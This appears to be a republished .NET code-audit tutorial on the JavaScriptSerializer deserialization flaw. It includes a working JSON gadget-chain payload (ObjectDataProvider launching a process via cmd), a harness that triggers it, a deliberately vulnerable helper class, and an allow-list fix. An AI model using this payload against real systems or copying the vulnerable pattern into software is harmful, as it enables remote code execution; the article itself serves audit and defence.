What is the JavaScript Serializer deserialization vulnerability?

2025-01-19 Update. From: SLTechnology News & Howtos, Network Security

Shulou (Shulou.com) 05/31 report

What is the JavaScriptSerializer deserialization vulnerability? Many readers are unfamiliar with it and with how to deal with it, so this article summarizes its cause and the corresponding fix. I hope it helps you solve the problem.

I. Preface

When .NET handles Ajax requests, serialization is usually provided by the JavaScriptSerializer class. It was introduced with ASP.NET AJAX on top of .NET 2.0 and has been bundled with the framework since .NET Framework 3.5; it lives in the System.Web.Script.Serialization namespace, is referenced through System.Web.Extensions, and lets developers convert between arbitrary .NET types and JSON with little effort. In some configurations, however, passing untrusted JSON to its Deserialize or DeserializeObject methods leads to a deserialization attack and, ultimately, remote code execution. The author introduces and reproduces the issue from the perspective of the underlying principle and of code auditing.

Previous lessons in this series:

.NET Advanced Code Audit (lesson 1) XmlSerializer deserialization vulnerability

.NET Advanced Code Audit (lesson 2) Json.Net deserialization vulnerability

.NET Advanced Code Audit (lesson 3) Fastjson deserialization vulnerability

II. JavaScriptSerializer serialization

Let's start with the classic piece of code used throughout this series of lessons.

The TestClass class defines three members and a static method, ClassMethod, that starts a process. For serialization, an instance is created and its members are assigned values.

The Serialize method of the JavaScriptSerializer class makes converting a .NET object to JSON trivial. The author instantiates a TestClass and calls Serialize to obtain the serialized JSON.

From the earlier lessons on the deserialization vulnerabilities of other components, we know that a __type key is required, and that its value must be the full identity of the type's assembly (assembly name, version, culture and public key token). In JavaScriptSerializer this is provided by a type resolver: passing a SimpleTypeResolver instance to the constructor makes the serializer write each managed type's assembly-qualified name into the serialized string. The author rewrites the code to add this type resolver.

The serialized output now contains a __type member holding the full assembly identity of TestClass.
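The following is an added example, not the article's own listing, that shows what the type resolver changes in the output and what happens on the way back. TestClass is a stand-in for the article's class: only the member Name is named on the page, the other two members and the namespace JssDemo are assumed. Compile against System.Web.Extensions.dll on .NET Framework (4.x assumed).

```csharp
// Added example (not the article's code): effect of SimpleTypeResolver on Serialize/Deserialize.
// Target: .NET Framework 4.x with a reference to System.Web.Extensions.dll (assumed).
using System;
using System.Diagnostics;
using System.Web.Script.Serialization;

namespace JssDemo
{
    // Stand-in for the article's TestClass; Classname and Age are assumed member names.
    public class TestClass
    {
        public string Classname { get; set; }
        public string Name { get; set; }
        public int Age { get; set; }

        // The article describes a static helper that starts a process.
        public static void ClassMethod(string classname)
        {
            Process.Start(classname);
        }
    }

    public static class SerializeDemo
    {
        public static void Main()
        {
            var obj = new TestClass { Classname = "Demo", Name = "Ivan", Age = 20 };

            // 1) Default serializer: TypeResolver is null, so no __type member is written.
            var plain = new JavaScriptSerializer();
            string json1 = plain.Serialize(obj);
            Console.WriteLine(json1);

            // 2) SimpleTypeResolver: its ResolveTypeId() returns Type.AssemblyQualifiedName,
            //    so the JSON now carries the full assembly identity of the runtime type as __type.
            var typed = new JavaScriptSerializer(new SimpleTypeResolver());
            string json2 = typed.Serialize(obj);
            Console.WriteLine(json2);

            // 3) Round trip with the resolver present: the __type value decides which type is
            //    instantiated (via SimpleTypeResolver.ResolveType, i.e. Type.GetType) and filled in.
            TestClass back = typed.Deserialize<TestClass>(json2);
            Console.WriteLine(back.Name);

            // 4) Without a resolver the deserializer simply drops the __type key and uses the
            //    requested target type, which is why the default configuration is not exploitable.
            TestClass back2 = plain.Deserialize<TestClass>(json2);
            Console.WriteLine(back2.Name);
        }
    }
}
```

The second serialization prints a __type value of the form "JssDemo.TestClass, JssDemo, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null", which is exactly the string an attacker later controls; step 4 shows that the same JSON is harmless when no resolver is configured.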

III. JavaScriptSerializer deserialization

3.1 Deserialization usage

Deserialization converts JSON data back into an object: create a JavaScriptSerializer instance and call its DeserializeObject or Deserialize method.

Internally, BasicDeserialize calls DeserializeInternal, and when the parsed dictionary has to be converted into an object the code checks whether the dictionary contains the key named by the ServerTypeFieldName constant.

ServerTypeFieldName is a constant defined in the JavaScriptSerializer class with the value "__type".

Peeling back the layers and skipping the non-core methods ConvertObjectToType, ConvertObjectToTypeMain and ConvertObjectToTypeInternal, the logic of interest sits in the ConvertDictionaryToObject method.

The code first checks for the presence of the ServerTypeFieldName key and stores its value in the object s; second, it casts s to the string variable serverTypeName; third, it asks the type resolver for the actual Type behind that name; finally, it constructs an instance of that type through System.Activator.CreateInstance.

The Activator class offers several overloads of the static CreateInstance method, which accept either a Type reference or a string identifying the type and return a reference to the newly created object. The demo in the figure shows the data before and after serialization and deserialization:

After deserialization the object's properties are available, and the value of the member Name is printed.

3.2 Building the PoC

By default JavaScriptSerializer uses no type resolver, so as shipped it is a safe serializer. The trigger for the vulnerability is therefore whether a SimpleTypeResolver was supplied when the JavaScriptSerializer instance was created. If it was, and the JSON being deserialized is attacker-controlled, the deserialization vulnerability can be triggered; the figure illustrates the call chain.

The author again chooses the ObjectDataProvider class, which makes it easy to call a method on any referenced class; see ".NET Advanced Code Audit (lesson 1) XmlSerializer deserialization vulnerability" for details of its use. Process.Start launches a process, and the process to launch is described by a ProcessStartInfo (file name, arguments), so ProcessStartInfo has to be serialized first. That part follows ".NET Advanced Code Audit (lesson 3) Fastjson deserialization vulnerability". The generated data is then trimmed, removing the irrelevant System.RuntimeType and System.IntPtr members, to arrive at the final deserialization PoC.

The author wrote the trigger code, deserialized the JSON with Deserialize, and successfully popped the calculator.
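The gadget chain described above, written out as JSON and fed to a serializer configured with SimpleTypeResolver, as an added example that is not the article's own PoC. The assembly versions and public key tokens are those of .NET Framework 4.x and are assumed here; adjust them to the target. The payload only names types: the application itself needs no reference to WPF, because SimpleTypeResolver.ResolveType() is Type.GetType(), which loads PresentationFramework from the GAC by its full name.

```csharp
// Added example (not the article's code): the ObjectDataProvider -> Process.Start chain as JSON.
// Assembly versions/tokens are .NET Framework 4.x values and are assumed; Windows only.
using System;
using System.Web.Script.Serialization;

public static class PocDemo
{
    // ObjectDataProvider (System.Windows.Data, PresentationFramework) calls MethodName on
    // ObjectInstance once both are assigned. ObjectInstance is a Process whose StartInfo has
    // already been populated, so the invoked Start() runs "cmd /c calc".
    // JavaScriptSerializer accepts single-quoted strings, which keeps the literal readable.
    public const string Payload = @"{
  '__type':'System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35',
  'MethodName':'Start',
  'ObjectInstance':{
    '__type':'System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089',
    'StartInfo':{
      '__type':'System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089',
      'FileName':'cmd',
      'Arguments':'/c calc'
    }
  }
}";

    public static void Main()
    {
        // The sink: a type resolver is present and the input is attacker-controlled.
        var serializer = new JavaScriptSerializer(new SimpleTypeResolver());

        // Deserialize<object>() and DeserializeObject() both end in ConvertDictionaryToObject,
        // where each nested __type is resolved and instantiated with Activator.CreateInstance.
        object result = serializer.Deserialize<object>(Payload);

        // By the time control returns here the method has already been invoked;
        // the returned object is the ObjectDataProvider that did it.
        Console.WriteLine(result.GetType().FullName);
    }
}
```

Note the member order inside the payload: StartInfo is assigned before the outer ObjectInstance, and MethodName before ObjectInstance, because JavaScriptSerializer assigns properties in the order the JSON presents them and ObjectDataProvider invokes the method as soon as it has both pieces.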

IV. Code audit perspective

4.1 Deserialize

From a code audit point of view, the taint point is easy to spot. From the previous sections we know that one key condition must hold, the presence of new SimpleTypeResolver(), and that the JSON passed in is then deserialized, as in the following JsonHelper class.

An attacker only needs to control the incoming string parameter input to trigger the deserialization vulnerability. Plenty of code on GitHub follows this unsafe pattern.

4.2 DeserializeObject

JavaScriptSerializer has a second deserialization method, DeserializeObject, which triggers the vulnerability in the same way. The tainted code has the same shape as above, with DeserializeObject in place of Deserialize.
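As an added example that is not the article's listing, the JsonHelper pattern flagged in 4.1 and 4.2 is shown with both sinks, beside a hardened variant built on the whitelist approach the summary recommends: a custom JavaScriptTypeResolver that maps only an explicit set of assembly-qualified names. The class and member names (JsonHelper, SafeJsonHelper, AllowListTypeResolver, a one-property TestClass) and the two sample inputs are constructed for this example.

```csharp
// Added example (not the article's code): vulnerable JsonHelper beside an allow-list resolver.
// Target: .NET Framework 4.x, reference System.Web.Extensions.dll (assumed).
using System;
using System.Collections.Generic;
using System.Linq;
using System.Web.Script.Serialization;

// Vulnerable: SimpleTypeResolver + attacker-controlled input. Both methods reach the same
// ConvertDictionaryToObject path, so both honour whatever __type the caller supplies.
public static class JsonHelper
{
    public static T Deserialize<T>(string input)
    {
        return new JavaScriptSerializer(new SimpleTypeResolver()).Deserialize<T>(input);
    }

    public static object DeserializeObject(string input)
    {
        return new JavaScriptSerializer(new SimpleTypeResolver()).DeserializeObject(input);
    }
}

// Hardened: a resolver that only maps names on a fixed list. Returning null from ResolveType
// makes JavaScriptSerializer throw InvalidOperationException instead of instantiating the type.
public sealed class AllowListTypeResolver : JavaScriptTypeResolver
{
    private readonly Dictionary<string, Type> _allowed;

    public AllowListTypeResolver(params Type[] allowed)
    {
        // Exact assembly-qualified names; Type.GetType()'s partial-name matching is deliberately avoided.
        _allowed = allowed.ToDictionary(t => t.AssemblyQualifiedName, t => t, StringComparer.Ordinal);
    }

    public override Type ResolveType(string id)
    {
        Type t;
        return _allowed.TryGetValue(id, out t) ? t : null;
    }

    public override string ResolveTypeId(Type type)
    {
        // Null here means "emit no __type" when serializing a type outside the list.
        return _allowed.ContainsKey(type.AssemblyQualifiedName) ? type.AssemblyQualifiedName : null;
    }
}

public static class SafeJsonHelper
{
    // One shared list for every call, so the set of constructible types is fixed in one place.
    private static readonly JavaScriptTypeResolver Resolver = new AllowListTypeResolver(typeof(TestClass));

    public static T Deserialize<T>(string input)
    {
        return new JavaScriptSerializer(Resolver).Deserialize<T>(input);
    }

    public static object DeserializeObject(string input)
    {
        return new JavaScriptSerializer(Resolver).DeserializeObject(input);
    }
}

public class TestClass
{
    public string Name { get; set; }
}

public static class AuditDemo
{
    public static void Main()
    {
        // Constructed inputs: a benign __type and a hostile one. No gadget body is needed to
        // show the check; naming a type outside the list is enough to be rejected.
        string benign = "{\"__type\":\"" + typeof(TestClass).AssemblyQualifiedName + "\",\"Name\":\"Ivan\"}";
        string hostile = "{\"__type\":\"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089\"}";

        Console.WriteLine(((TestClass)SafeJsonHelper.DeserializeObject(benign)).Name);

        try
        {
            SafeJsonHelper.DeserializeObject(hostile);
        }
        catch (InvalidOperationException)
        {
            Console.WriteLine("rejected: __type is not on the allow-list");
        }

        // For contrast, the vulnerable helper instantiates System.Diagnostics.Process without complaint.
        Console.WriteLine(JsonHelper.DeserializeObject(hostile).GetType().FullName);
    }
}
```

When auditing, the search pattern is therefore not "JavaScriptSerializer" but "new JavaScriptSerializer(" with any non-null resolver argument followed by Deserialize/DeserializeObject on request data; a project that never passes a resolver does not need the allow-list at all.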

V. Case review

Finally, the whole process is reviewed with the following example, debugged in Visual Studio, in which the calculator is popped through the deserialization vulnerability.

1. Send a POST request to http://localhost:5651/Default carrying the payload in the value parameter.

2. The value is deserialized via DeserializeObject and the calculator pops up.

Finally, an animated demonstration is attached:

VI. Summary

Thanks to the convenience Microsoft built into it, JavaScriptSerializer is widely used in real development. As long as no type resolver is used, or the type resolver only resolves types on a whitelist, deserialization attacks are prevented (the default is a safe serializer). For attackers the likelihood of exploitation in practice is not high, since most developers do not wire up SimpleTypeResolver when processing data.
